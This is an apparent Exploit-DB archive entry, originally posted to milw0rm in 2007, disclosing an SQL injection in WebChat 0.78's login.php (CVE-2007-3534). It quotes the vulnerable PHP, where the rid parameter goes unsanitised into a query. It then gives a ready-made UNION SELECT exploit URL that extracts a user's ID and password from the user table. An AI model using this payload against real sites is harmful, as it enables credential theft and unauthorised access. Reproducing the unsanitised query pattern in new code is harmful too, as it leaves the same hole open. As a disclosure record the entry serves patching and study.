WebChat 0.78 - 'login.php?rid' SQL Injection

Author: r00t
type: webapps
platform: php
port: 
date_added: 2007-06-27 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-36295;CVE-2007-3534 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comwebchat-078.zip

#########################################################################
#
#               [webchat 0.78]
#
# Class:     SQL Injection
# Published  28/06/2007
# Remote:    Yes
# Critical   Level : Dangerous
# Site:      http://sourceforge.net/projects/webdev-webchat/
# Download:  http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author:    r00t
#########################################################################


               Vulnerable code:
               login.php
======================================================
<?
       $q = new DB_Chat;
       $q->query("select * from room where rid='$rid'");
       if ($q->next_record()) {
?>
=======================================================

               Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================

               Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================

# milw0rm.com [2007-06-28]